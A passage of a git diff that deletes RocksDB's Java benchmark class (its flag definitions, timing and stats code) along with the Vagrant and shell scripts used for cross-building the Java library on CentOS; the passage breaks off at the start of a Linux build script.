-            executor.shutdownNow();
-          }
-          setFinished(true);
-          bgExecutor.shutdown();
-          finished = bgExecutor.awaitTermination(10, TimeUnit.SECONDS);
-          if (!finished) {
-            System.out.format(
-                "Benchmark %s was not finished before timeout.",
-                benchmark);
-            bgExecutor.shutdownNow();
-          }
-
-          stop(benchmark, results, currentTaskId);
-        } catch (InterruptedException e) {
-          System.err.println(e);
-        }
-      }
-      writeOpt.dispose();
-      readOpt.dispose();
-    }
-    options.dispose();
-    db_.close();
-  }
-
-  private void printHeader(Options options) {
-    int kKeySize = 16;
-    System.out.printf("Keys:     %d bytes each\n", kKeySize);
-    System.out.printf("Values:   %d bytes each (%d bytes after compression)\n",
-        valueSize_,
-        (int) (valueSize_ * compressionRatio_ + 0.5));
-    System.out.printf("Entries:  %d\n", num_);
-    System.out.printf("RawSize:  %.1f MB (estimated)\n",
-        ((double)(kKeySize + valueSize_) * num_) / SizeUnit.MB);
-    System.out.printf("FileSize:   %.1f MB (estimated)\n",
-        (((kKeySize + valueSize_ * compressionRatio_) * num_) / SizeUnit.MB));
-    System.out.format("Memtable Factory: %s%n", options.memTableFactoryName());
-    System.out.format("Prefix:   %d bytes%n", prefixSize_);
-    System.out.format("Compression: %s%n", compressionType_);
-    printWarnings();
-    System.out.printf("------------------------------------------------\n");
-  }
-
-  void printWarnings() {
-    boolean assertsEnabled = false;
-    assert assertsEnabled = true; // Intentional side effect!!!
-    if (assertsEnabled) {
-      System.out.printf(
-          "WARNING: Assertions are enabled; benchmarks unnecessarily slow\n");
-    }
-  }
-
-  private void open(Options options) throws RocksDBException {
-    System.out.println("Using database directory: " + databaseDir_);
-    db_ = RocksDB.open(options, databaseDir_);
-  }
-
-  private void start() {
-    setFinished(false);
-    startTime_ = System.nanoTime();
-  }
-
-  private void stop(
-      String benchmark, List<Future<Stats>> results, int concurrentThreads) {
-    long endTime = System.nanoTime();
-    double elapsedSeconds =
-        1.0d * (endTime - startTime_) / TimeUnit.SECONDS.toNanos(1);
-
-    Stats stats = new Stats(-1);
-    int taskFinishedCount = 0;
-    for (Future<Stats> result : results) {
-      if (result.isDone()) {
-        try {
-          Stats taskStats = result.get(3, TimeUnit.SECONDS);
-          if (!result.isCancelled()) {
-            taskFinishedCount++;
-          }
-          stats.merge(taskStats);
-        } catch (Exception e) {
-          // then it's not successful, the output will indicate this
-        }
-      }
-    }
-    String extra = "";
-    if (benchmark.indexOf("read") >= 0) {
-      extra = String.format(" %d / %d found; ", stats.found_, stats.done_);
-    } else {
-      extra = String.format(" %d ops done; ", stats.done_);
-    }
-
-    System.out.printf(
-        "%-16s : %11.5f micros/op; %6.1f MB/s;%s %d / %d task(s) finished.\n",
-        benchmark, elapsedSeconds / stats.done_ * 1e6,
-        (stats.bytes_ / 1048576.0) / elapsedSeconds, extra,
-        taskFinishedCount, concurrentThreads);
-  }
-
-  public void generateKeyFromLong(byte[] slice, long n) {
-    assert(n >= 0);
-    int startPos = 0;
-
-    if (keysPerPrefix_ > 0) {
-      long numPrefix = (num_ + keysPerPrefix_ - 1) / keysPerPrefix_;
-      long prefix = n % numPrefix;
-      int bytesToFill = Math.min(prefixSize_, 8);
-      for (int i = 0; i < bytesToFill; ++i) {
-        slice[i] = (byte) (prefix % 256);
-        prefix /= 256;
-      }
-      for (int i = 8; i < bytesToFill; ++i) {
-        slice[i] = '0';
-      }
-      startPos = bytesToFill;
-    }
-
-    for (int i = slice.length - 1; i >= startPos; --i) {
-      slice[i] = (byte) ('0' + (n % 10));
-      n /= 10;
-    }
-  }
-
-  private void destroyDb() {
-    if (db_ != null) {
-      db_.close();
-    }
-    // TODO(yhchiang): develop our own FileUtil
-    // FileUtil.deleteDir(databaseDir_);
-  }
-
-  private void printStats() {
-  }
-
-  static void printHelp() {
-    System.out.println("usage:");
-    for (Flag flag : Flag.values()) {
-      System.out.format("  --%s%n\t%s%n",
-          flag.name(),
-          flag.desc());
-      if (flag.getDefaultValue() != null) {
-        System.out.format("\tDEFAULT: %s%n",
-            flag.getDefaultValue().toString());
-      }
-    }
-  }
-
-  public static void main(String[] args) throws Exception {
-    Map<Flag, Object> flags = new EnumMap<Flag, Object>(Flag.class);
-    for (Flag flag : Flag.values()) {
-      if (flag.getDefaultValue() != null) {
-        flags.put(flag, flag.getDefaultValue());
-      }
-    }
-    for (String arg : args) {
-      boolean valid = false;
-      if (arg.equals("--help") || arg.equals("-h")) {
-        printHelp();
-        System.exit(0);
-      }
-      if (arg.startsWith("--")) {
-        try {
-          String[] parts = arg.substring(2).split("=");
-          if (parts.length >= 1) {
-            Flag key = Flag.valueOf(parts[0]);
-            if (key != null) {
-              Object value = null;
-              if (parts.length >= 2) {
-                value = key.parseValue(parts[1]);
-              }
-              flags.put(key, value);
-              valid = true;
-            }
-          }
-        }
-        catch (Exception e) {
-        }
-      }
-      if (!valid) {
-        System.err.println("Invalid argument " + arg);
-        System.exit(1);
-      }
-    }
-    new DbBenchmark(flags).run();
-  }
-
-  private enum Flag {
-    benchmarks(
-        Arrays.asList(
-            "fillseq",
-            "readrandom",
-            "fillrandom"),
-        "Comma-separated list of operations to run in the specified order\n" +
-        "\tActual benchmarks:\n" +
-        "\t\tfillseq          -- write N values in sequential key order in async mode.\n" +
-        "\t\tfillrandom       -- write N values in random key order in async mode.\n" +
-        "\t\tfillbatch        -- write N/1000 batch where each batch has 1000 values\n" +
-        "\t\t                   in random key order in sync mode.\n" +
-        "\t\tfillsync         -- write N/100 values in random key order in sync mode.\n" +
-        "\t\tfill100K         -- write N/1000 100K values in random order in async mode.\n" +
-        "\t\treadseq          -- read N times sequentially.\n" +
-        "\t\treadrandom       -- read N times in random order.\n" +
-        "\t\treadhot          -- read N times in random order from 1% section of DB.\n" +
-        "\t\treadwhilewriting -- measure the read performance of multiple readers\n" +
-        "\t\t                   with a bg single writer.  The write rate of the bg\n" +
-        "\t\t                   is capped by --writes_per_second.\n" +
-        "\tMeta Operations:\n" +
-        "\t\tdelete            -- delete DB") {
-      @Override public Object parseValue(String value) {
-        return new ArrayList<String>(Arrays.asList(value.split(",")));
-      }
-    },
-    compression_ratio(0.5d,
-        "Arrange to generate values that shrink to this fraction of\n" +
-        "\ttheir original size after compression.") {
-      @Override public Object parseValue(String value) {
-        return Double.parseDouble(value);
-      }
-    },
-    use_existing_db(false,
-        "If true, do not destroy the existing database.  If you set this\n" +
-        "\tflag and also specify a benchmark that wants a fresh database,\n" +
-        "\tthat benchmark will fail.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    num(1000000,
-        "Number of key/values to place in database.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    threads(1,
-        "Number of concurrent threads to run.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    reads(null,
-        "Number of read operations to do.  If negative, do --nums reads.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    key_size(16,
-        "The size of each key in bytes.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    value_size(100,
-        "The size of each value in bytes.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    write_buffer_size(4L * SizeUnit.MB,
-        "Number of bytes to buffer in memtable before compacting\n" +
-        "\t(initialized to default value by 'main'.)") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    max_write_buffer_number(2,
-             "The number of in-memory memtables. Each memtable is of size\n" +
-             "\twrite_buffer_size.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    prefix_size(0, "Controls the prefix size for HashSkipList, HashLinkedList,\n" +
-                   "\tand plain table.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    keys_per_prefix(0, "Controls the average number of keys generated\n" +
-             "\tper prefix, 0 means no special handling of the prefix,\n" +
-             "\ti.e. use the prefix comes with the generated random number.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    memtablerep("skip_list",
-        "The memtable format.  Available options are\n" +
-        "\tskip_list,\n" +
-        "\tvector,\n" +
-        "\thash_linkedlist,\n" +
-        "\thash_skiplist (prefix_hash.)") {
-      @Override public Object parseValue(String value) {
-        return value;
-      }
-    },
-    hash_bucket_count(SizeUnit.MB,
-        "The number of hash buckets used in the hash-bucket-based\n" +
-        "\tmemtables.  Memtables that currently support this argument are\n" +
-        "\thash_linkedlist and hash_skiplist.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    writes_per_second(10000,
-        "The write-rate of the background writer used in the\n" +
-        "\t`readwhilewriting` benchmark.  Non-positive number indicates\n" +
-        "\tusing an unbounded write-rate in `readwhilewriting` benchmark.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    use_plain_table(false,
-        "Use plain-table sst format.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    cache_size(-1L,
-        "Number of bytes to use as a cache of uncompressed data.\n" +
-        "\tNegative means use default settings.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    seed(0L,
-        "Seed base for random number generators.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    num_levels(7,
-        "The total number of levels.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    numdistinct(1000L,
-        "Number of distinct keys to use. Used in RandomWithVerify to\n" +
-        "\tread/write on fewer keys so that gets are more likely to find the\n" +
-        "\tkey and puts are more likely to update the same key.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    merge_keys(-1L,
-        "Number of distinct keys to use for MergeRandom and\n" +
-        "\tReadRandomMergeRandom.\n" +
-        "\tIf negative, there will be FLAGS_num keys.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    bloom_locality(0,"Control bloom filter probes locality.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    duration(0,"Time in seconds for the random-ops tests to run.\n" +
-        "\tWhen 0 then num & reads determine the test duration.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    num_multi_db(0,
-        "Number of DBs used in the benchmark. 0 means single DB.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    histogram(false,"Print histogram of operation timings.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    min_write_buffer_number_to_merge(
-        defaultOptions_.minWriteBufferNumberToMerge(),
-        "The minimum number of write buffers that will be merged together\n" +
-        "\tbefore writing to storage. This is cheap because it is an\n" +
-        "\tin-memory merge. If this feature is not enabled, then all these\n" +
-        "\twrite buffers are flushed to L0 as separate files and this\n" +
-        "\tincreases read amplification because a get request has to check\n" +
-        "\tin all of these files. Also, an in-memory merge may result in\n" +
-        "\twriting less data to storage if there are duplicate records\n" +
-        "\tin each of these individual write buffers.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    max_background_compactions(
-        defaultOptions_.maxBackgroundCompactions(),
-        "The maximum number of concurrent background compactions\n" +
-        "\tthat can occur in parallel.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    max_background_flushes(
-        defaultOptions_.maxBackgroundFlushes(),
-        "The maximum number of concurrent background flushes\n" +
-        "\tthat can occur in parallel.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    /* TODO(yhchiang): enable the following
-    compaction_style((int32_t) defaultOptions_.compactionStyle(),
-        "style of compaction: level-based vs universal.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },*/
-    universal_size_ratio(0,
-        "Percentage flexibility while comparing file size\n" +
-        "\t(for universal compaction only).") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    universal_min_merge_width(0,"The minimum number of files in a\n" +
-        "\tsingle compaction run (for universal compaction only).") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    universal_max_merge_width(0,"The max number of files to compact\n" +
-        "\tin universal style compaction.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    universal_max_size_amplification_percent(0,
-        "The max size amplification for universal style compaction.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    universal_compression_size_percent(-1,
-        "The percentage of the database to compress for universal\n" +
-        "\tcompaction. -1 means compress everything.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    block_size(defaultBlockBasedTableOptions_.blockSize(),
-        "Number of bytes in a block.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    compressed_cache_size(-1L,
-        "Number of bytes to use as a cache of compressed data.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    open_files(defaultOptions_.maxOpenFiles(),
-        "Maximum number of files to keep open at the same time\n" +
-        "\t(use default if == 0)") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    bloom_bits(-1,"Bloom filter bits per key. Negative means\n" +
-        "\tuse default settings.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    memtable_bloom_size_ratio(0.0d, "Ratio of memtable used by the bloom filter.\n"
-            + "\t0 means no bloom filter.") {
-      @Override public Object parseValue(String value) {
-        return Double.parseDouble(value);
-      }
-    },
-    cache_numshardbits(-1,"Number of shards for the block cache\n" +
-        "\tis 2 ** cache_numshardbits. Negative means use default settings.\n" +
-        "\tThis is applied only if FLAGS_cache_size is non-negative.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    verify_checksum(false,"Verify checksum for every block read\n" +
-        "\tfrom storage.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    statistics(false,"Database statistics.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    writes(-1L, "Number of write operations to do. If negative, do\n" +
-        "\t--num reads.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    sync(false,"Sync all writes to disk.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    use_fsync(false,"If true, issue fsync instead of fdatasync.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    disable_wal(false,"If true, do not write WAL for write.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    wal_dir("", "If not empty, use the given dir for WAL.") {
-      @Override public Object parseValue(String value) {
-        return value;
-      }
-    },
-    target_file_size_base(2 * 1048576,"Target file size at level-1") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    target_file_size_multiplier(1,
-        "A multiplier to compute target level-N file size (N >= 2)") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    max_bytes_for_level_base(10 * 1048576,
-      "Max bytes for level-1") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    max_bytes_for_level_multiplier(10.0d,
-        "A multiplier to compute max bytes for level-N (N >= 2)") {
-      @Override public Object parseValue(String value) {
-        return Double.parseDouble(value);
-      }
-    },
-    level0_stop_writes_trigger(12,"Number of files in level-0\n" +
-        "\tthat will trigger put stop.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    level0_slowdown_writes_trigger(8,"Number of files in level-0\n" +
-        "\tthat will slow down writes.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    level0_file_num_compaction_trigger(4,"Number of files in level-0\n" +
-        "\twhen compactions start.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    readwritepercent(90,"Ratio of reads to reads/writes (expressed\n" +
-        "\tas percentage) for the ReadRandomWriteRandom workload. The\n" +
-        "\tdefault value 90 means 90% operations out of all reads and writes\n" +
-        "\toperations are reads. In other words, 9 gets for every 1 put.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    mergereadpercent(70,"Ratio of merges to merges&reads (expressed\n" +
-        "\tas percentage) for the ReadRandomMergeRandom workload. The\n" +
-        "\tdefault value 70 means 70% out of all read and merge operations\n" +
-        "\tare merges. In other words, 7 merges for every 3 gets.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    deletepercent(2,"Percentage of deletes out of reads/writes/\n" +
-        "\tdeletes (used in RandomWithVerify only). RandomWithVerify\n" +
-        "\tcalculates writepercent as (100 - FLAGS_readwritepercent -\n" +
-        "\tdeletepercent), so deletepercent must be smaller than (100 -\n" +
-        "\tFLAGS_readwritepercent)") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    delete_obsolete_files_period_micros(0,"Option to delete\n" +
-        "\tobsolete files periodically. 0 means that obsolete files are\n" +
-        "\tdeleted after every compaction run.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    compression_type("snappy",
-        "Algorithm used to compress the database.") {
-      @Override public Object parseValue(String value) {
-        return value;
-      }
-    },
-    compression_level(-1,
-        "Compression level. For zlib this should be -1 for the\n" +
-        "\tdefault level, or between 0 and 9.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    min_level_to_compress(-1,"If non-negative, compression starts\n" +
-        "\tfrom this level. Levels with number < min_level_to_compress are\n" +
-        "\tnot compressed. Otherwise, apply compression_type to\n" +
-        "\tall levels.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    table_cache_numshardbits(4,"") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    stats_interval(0L, "Stats are reported every N operations when\n" +
-        "\tthis is greater than zero. When 0 the interval grows over time.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    stats_per_interval(0,"Reports additional stats per interval when\n" +
-        "\tthis is greater than 0.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    perf_level(0,"Level of perf collection.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    soft_rate_limit(0.0d,"") {
-      @Override public Object parseValue(String value) {
-        return Double.parseDouble(value);
-      }
-    },
-    hard_rate_limit(0.0d,"When not equal to 0 this make threads\n" +
-        "\tsleep at each stats reporting interval until the compaction\n" +
-        "\tscore for all levels is less than or equal to this value.") {
-      @Override public Object parseValue(String value) {
-        return Double.parseDouble(value);
-      }
-    },
-    rate_limit_delay_max_milliseconds(1000,
-        "When hard_rate_limit is set then this is the max time a put will\n" +
-        "\tbe stalled.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    max_compaction_bytes(0L, "Limit number of bytes in one compaction to be lower than this\n" +
-            "\threshold. But it's not guaranteed.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    readonly(false,"Run read only benchmarks.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    disable_auto_compactions(false,"Do not auto trigger compactions.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    wal_ttl_seconds(0L,"Set the TTL for the WAL Files in seconds.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    wal_size_limit_MB(0L,"Set the size limit for the WAL Files\n" +
-        "\tin MB.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    /* TODO(yhchiang): enable the following
-    direct_reads(rocksdb::EnvOptions().use_direct_reads,
-        "Allow direct I/O reads.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-      },
-    direct_writes(rocksdb::EnvOptions().use_direct_reads,
-      "Allow direct I/O reads.") {
-      @Override public Object parseValue(String value) {
-      return parseBoolean(value);
-      }
-      },
-    */
-    mmap_read(false,
-        "Allow reads to occur via mmap-ing files.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    mmap_write(false,
-        "Allow writes to occur via mmap-ing files.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    advise_random_on_open(defaultOptions_.adviseRandomOnOpen(),
-        "Advise random access on table file open.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    compaction_fadvice("NORMAL",
-      "Access pattern advice when a file is compacted.") {
-      @Override public Object parseValue(String value) {
-        return value;
-      }
-    },
-    use_tailing_iterator(false,
-        "Use tailing iterator to access a series of keys instead of get.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    use_adaptive_mutex(defaultOptions_.useAdaptiveMutex(),
-        "Use adaptive mutex.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    bytes_per_sync(defaultOptions_.bytesPerSync(),
-        "Allows OS to incrementally sync files to disk while they are\n" +
-        "\tbeing written, in the background. Issue one request for every\n" +
-        "\tbytes_per_sync written. 0 turns it off.") {
-      @Override public Object parseValue(String value) {
-        return Long.parseLong(value);
-      }
-    },
-    filter_deletes(false," On true, deletes use bloom-filter and drop\n" +
-        "\tthe delete if key not present.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    max_successive_merges(0,"Maximum number of successive merge\n" +
-        "\toperations on a key in the memtable.") {
-      @Override public Object parseValue(String value) {
-        return Integer.parseInt(value);
-      }
-    },
-    db(getTempDir("rocksdb-jni"),
-       "Use the db with the following name.") {
-      @Override public Object parseValue(String value) {
-        return value;
-      }
-    },
-    use_mem_env(false, "Use RocksMemEnv instead of default filesystem based\n" +
-        "environment.") {
-      @Override public Object parseValue(String value) {
-        return parseBoolean(value);
-      }
-    },
-    java_comparator(null, "Class name of a Java Comparator to use instead\n" +
-        "\tof the default C++ ByteWiseComparatorImpl. Must be available on\n" +
-        "\tthe classpath") {
-      @Override
-      protected Object parseValue(final String value) {
-        try {
-          final ComparatorOptions copt = new ComparatorOptions();
-          final Class<AbstractComparator> clsComparator =
-              (Class<AbstractComparator>)Class.forName(value);
-          final Constructor cstr =
-              clsComparator.getConstructor(ComparatorOptions.class);
-          return cstr.newInstance(copt);
-        } catch(final ClassNotFoundException cnfe) {
-          throw new IllegalArgumentException("Java Comparator '" + value + "'" +
-              " not found on the classpath", cnfe);
-        } catch(final NoSuchMethodException nsme) {
-          throw new IllegalArgumentException("Java Comparator '" + value + "'" +
-              " does not have a public ComparatorOptions constructor", nsme);
-        } catch(final IllegalAccessException | InstantiationException
-            | InvocationTargetException ie) {
-          throw new IllegalArgumentException("Unable to construct Java" +
-              " Comparator '" + value + "'", ie);
-        }
-      }
-    };
-
-    private Flag(Object defaultValue, String desc) {
-      defaultValue_ = defaultValue;
-      desc_ = desc;
-    }
-
-    public Object getDefaultValue() {
-      return defaultValue_;
-    }
-
-    public String desc() {
-      return desc_;
-    }
-
-    public boolean parseBoolean(String value) {
-      if (value.equals("1")) {
-        return true;
-      } else if (value.equals("0")) {
-        return false;
-      }
-      return Boolean.parseBoolean(value);
-    }
-
-    protected abstract Object parseValue(String value);
-
-    private final Object defaultValue_;
-    private final String desc_;
-  }
-
-  private final static String DEFAULT_TEMP_DIR = "/tmp";
-
-  private static String getTempDir(final String dirName) {
-    try {
-      return Files.createTempDirectory(dirName).toAbsolutePath().toString();
-    } catch(final IOException ioe) {
-      System.err.println("Unable to create temp directory, defaulting to: " +
-          DEFAULT_TEMP_DIR);
-      return DEFAULT_TEMP_DIR + File.pathSeparator + dirName;
-    }
-  }
-
-  private static class RandomGenerator {
-    private final byte[] data_;
-    private int dataLength_;
-    private int position_;
-    private double compressionRatio_;
-    Random rand_;
-
-    private RandomGenerator(long seed, double compressionRatio) {
-      // We use a limited amount of data over and over again and ensure
-      // that it is larger than the compression window (32KB), and also
-      byte[] value = new byte[100];
-      // large enough to serve all typical value sizes we want to write.
-      rand_ = new Random(seed);
-      dataLength_ = value.length * 10000;
-      data_ = new byte[dataLength_];
-      compressionRatio_ = compressionRatio;
-      int pos = 0;
-      while (pos < dataLength_) {
-        compressibleBytes(value);
-        System.arraycopy(value, 0, data_, pos,
-                         Math.min(value.length, dataLength_ - pos));
-        pos += value.length;
-      }
-    }
-
-    private void compressibleBytes(byte[] value) {
-      int baseLength = value.length;
-      if (compressionRatio_ < 1.0d) {
-        baseLength = (int) (compressionRatio_ * value.length + 0.5);
-      }
-      if (baseLength <= 0) {
-        baseLength = 1;
-      }
-      int pos;
-      for (pos = 0; pos < baseLength; ++pos) {
-        value[pos] = (byte) (' ' + rand_.nextInt(95));  // ' ' .. '~'
-      }
-      while (pos < value.length) {
-        System.arraycopy(value, 0, value, pos,
-                         Math.min(baseLength, value.length - pos));
-        pos += baseLength;
-      }
-    }
-
-    private void generate(byte[] value) {
-      if (position_ + value.length > data_.length) {
-        position_ = 0;
-        assert(value.length <= data_.length);
-      }
-      position_ += value.length;
-      System.arraycopy(data_, position_ - value.length,
-                       value, 0, value.length);
-    }
-  }
-
-  boolean isFinished() {
-    synchronized(finishLock_) {
-      return isFinished_;
-    }
-  }
-
-  void setFinished(boolean flag) {
-    synchronized(finishLock_) {
-      isFinished_ = flag;
-    }
-  }
-
-  RocksDB db_;
-  final List<String> benchmarks_;
-  final int num_;
-  final int reads_;
-  final int keySize_;
-  final int valueSize_;
-  final int threadNum_;
-  final int writesPerSeconds_;
-  final long randSeed_;
-  final boolean useExisting_;
-  final String databaseDir_;
-  double compressionRatio_;
-  RandomGenerator gen_;
-  long startTime_;
-
-  // env
-  boolean useMemenv_;
-
-  // memtable related
-  final int maxWriteBufferNumber_;
-  final int prefixSize_;
-  final int keysPerPrefix_;
-  final String memtable_;
-  final long hashBucketCount_;
-
-  // sst format related
-  boolean usePlainTable_;
-
-  Object finishLock_;
-  boolean isFinished_;
-  Map<Flag, Object> flags_;
-  // as the scope of a static member equals to the scope of the problem,
-  // we let its c++ pointer to be disposed in its finalizer.
-  static Options defaultOptions_ = new Options();
-  static BlockBasedTableConfig defaultBlockBasedTableOptions_ =
-    new BlockBasedTableConfig();
-  String compressionType_;
-  CompressionType compression_;
-}
diff --git a/thirdparty/rocksdb/java/crossbuild/Vagrantfile b/thirdparty/rocksdb/java/crossbuild/Vagrantfile
deleted file mode 100644
index 4a32177..0000000
--- a/thirdparty/rocksdb/java/crossbuild/Vagrantfile
+++ /dev/null
@@ -1,27 +0,0 @@
-# -*- mode: ruby -*-
-# vi: set ft=ruby :
-
-# Vagrantfile API/syntax version. Don't touch unless you know what you're doing!
-VAGRANTFILE_API_VERSION = "2"
-
-Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
-
-  config.vm.define "linux32" do |linux32|
-    linux32.vm.box = "hansode/centos-6.7-i386"
-  end
-
-  config.vm.define "linux64" do |linux64|
-    linux64.vm.box = "hansode/centos-6.7-x86_64"
-  end
-
-  config.vm.provider "virtualbox" do |v|
-    v.memory = 2048
-    v.cpus = 4
-    v.customize ["modifyvm", :id, "--nictype1", "virtio" ]
-  end
-
-  config.vm.provision :shell, path: "build-linux-centos.sh"
-  config.vm.synced_folder "../target", "/rocksdb-build"
-  config.vm.synced_folder "../..", "/rocksdb", type: "rsync"
-  config.vm.boot_timeout = 1200
-end
diff --git a/thirdparty/rocksdb/java/crossbuild/build-linux-centos.sh b/thirdparty/rocksdb/java/crossbuild/build-linux-centos.sh
deleted file mode 100755
index 2832eed..0000000
--- a/thirdparty/rocksdb/java/crossbuild/build-linux-centos.sh
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env bash
-
-set -e
-
-# remove fixed relesever variable present in the hanscode boxes
-sudo rm -f /etc/yum/vars/releasever
-
-# enable EPEL
-sudo yum -y install epel-release
-
-# install all required packages for rocksdb that are available through yum
-sudo yum -y install openssl java-1.7.0-openjdk-devel zlib-devel bzip2-devel lz4-devel snappy-devel libzstd-devel
-
-# install gcc/g++ 4.8.2 from tru/devtools-2
-sudo wget -O /etc/yum.repos.d/devtools-2.repo https://people.centos.org/tru/devtools-2/devtools-2.repo
-sudo yum -y install devtoolset-2-binutils devtoolset-2-gcc devtoolset-2-gcc-c++
-
-# install gflags
-wget https://github.com/gflags/gflags/archive/v2.0.tar.gz -O gflags-2.0.tar.gz
-tar xvfz gflags-2.0.tar.gz; cd gflags-2.0; scl enable devtoolset-2 ./configure; scl enable devtoolset-2 make; sudo make install
-export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib
-
-# set java home so we can build rocksdb jars
-export JAVA_HOME=/usr/lib/jvm/java-1.7.0
-
-# build rocksdb
-cd /rocksdb
-scl enable devtoolset-2 'make jclean clean'
-scl enable devtoolset-2 'PORTABLE=1 make rocksdbjavastatic'
-cp /rocksdb/java/target/librocksdbjni-* /rocksdb-build
-cp /rocksdb/java/target/rocksdbjni-* /rocksdb-build
-
diff --git a/thirdparty/rocksdb/java/crossbuild/build-linux.sh b/thirdparty/rocksdb/java/crossbuild/build-linux.sh
deleted file mode 100755
index 48d1c28..0000000
--- a/thirdparty/rocksdb/java/crossbuild/build-linux.sh
+++ /dev/null
@@ -1,14 +0,0 @@
-#!/usr/bin/env bash
-# install all required packages for rocksdb
-sudo apt-get update
